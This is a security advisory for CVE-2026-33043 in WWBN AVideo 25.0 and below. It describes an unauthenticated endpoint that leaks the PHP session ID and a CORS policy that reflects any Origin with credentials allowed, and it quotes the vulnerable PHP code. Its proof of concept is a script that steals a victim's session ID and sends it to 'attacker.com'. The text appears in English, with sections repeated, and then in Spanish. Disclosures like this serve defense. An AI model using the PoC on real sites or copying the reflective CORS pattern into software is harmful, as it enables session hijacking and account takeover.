CVE-2026-33043

WWBN AVideo is an open source video platform. In versions 25.0 and below, /objects/phpsessionid.json.php exposes the current PHP session ID to any unauthenticated request. The allowOrigin() function reflects any Origin header back in Access-Control-Allow-Origin with Access-Control-Allow-Credentials: true, enabling cross-origin session theft and full account takeover. This issue has been fixed in version 26.0.

WWBN AVideo is an open source video platform. In versions 25.0 and below, /objects/phpsessionid.json.php exposes the current PHP session ID to any unauthenticated request. The allowOrigin() function reflects any Origin header back in Access-Control-Allow-Origin with Access-Control-Allow-Credentials: true, enabling cross-origin session theft and full account takeover. This issue has been fixed in version 26.0.

### Summary `/objects/phpsessionid.json.php` exposes the current PHP session ID to any unauthenticated request. The `allowOrigin()` function reflects any `Origin` header back in `Access-Control-Allow-Origin` with `Access-Control-Allow-Credentials: true`, enabling cross-origin session theft and full account takeover. ### Details **File:** `objects/phpsessionid.json.php` ```php allowOrigin(); $obj = new stdClass(); $obj->phpsessid = session_id(); echo _json_encode($obj); ``` No authentication is required. The `allowOrigin()` function in `objects/functions.php` (line ~2648) reflects the request Origin: ```php $HTTP_ORIGIN = empty($_SERVER['HTTP_ORIGIN']) ? @$_SERVER['HTTP_REFERER'] : $_SERVER['HTTP_ORIGIN']; header("Access-Control-Allow-Origin: " . $HTTP_ORIGIN); header("Access-Control-Allow-Credentials: true"); ``` This means any external website can make a credentialed cross-origin request and read the session ID. ### PoC An attacker hosts the following page: ```html <script> fetch('https://TARGET/objects/phpsessionid.json.php', { credentials: 'include' }) .then(r => r.json()) .then(d => { // d.phpsessid = victim's session ID document.location = 'https://attacker.com/steal?sid=' + d.phpsessid; }); </script> ``` When a logged-in AVideo user visits the attacker's page, their PHP session ID is stolen via the permissive CORS policy, allowing the attacker to hijack their session. ### Impact **Account Takeover** — Any logged-in user (including administrators) who visits an attacker-controlled page will have their session stolen. The attacker can then impersonate them with full privileges.

### Summary `/objects/phpsessionid.json.php` exposes the current PHP session ID to any unauthenticated request. The `allowOrigin()` function reflects any `Origin` header back in `Access-Control-Allow-Origin` with `Access-Control-Allow-Credentials: true`, enabling cross-origin session theft and full account takeover. ### Details **File:** `objects/phpsessionid.json.php` ```php allowOrigin(); $obj = new stdClass(); $obj->phpsessid = session_id(); echo _json_encode($obj); ``` No authentication is required. The `allowOrigin()` function in `objects/functions.php` (line ~2648) reflects the request Origin: ```php $HTTP_ORIGIN = empty($_SERVER['HTTP_ORIGIN']) ? @$_SERVER['HTTP_REFERER'] : $_SERVER['HTTP_ORIGIN']; header("Access-Control-Allow-Origin: " . $HTTP_ORIGIN); header("Access-Control-Allow-Credentials: true"); ``` This means any external website can make a credentialed cross-origin request and read the session ID. ### PoC An attacker hosts the following page: ```html <script> fetch('https://TARGET/objects/phpsessionid.json.php', { credentials: 'include' }) .then(r => r.json()) .then(d => { // d.phpsessid = victim's session ID document.location = 'https://attacker.com/steal?sid=' + d.phpsessid; }); </script> ``` When a logged-in AVideo user visits the attacker's page, their PHP session ID is stolen via the permissive CORS policy, allowing the attacker to hijack their session. ### Impact **Account Takeover** — Any logged-in user (including administrators) who visits an attacker-controlled page will have their session stolen. The attacker can then impersonate them with full privileges.

WWBN AVideo es una plataforma de video de código abierto. En las versiones 25.0 e inferiores, /objects/phpsessionid.json.php expone el ID de sesión PHP actual a cualquier solicitud no autenticada. La función allowOrigin() refleja cualquier encabezado Origin de vuelta en Access-Control-Allow-Origin con Access-Control-Allow-Credentials: true, lo que permite el robo de sesión de origen cruzado y la toma de control total de la cuenta. Este problema ha sido solucionado en la versión 26.0.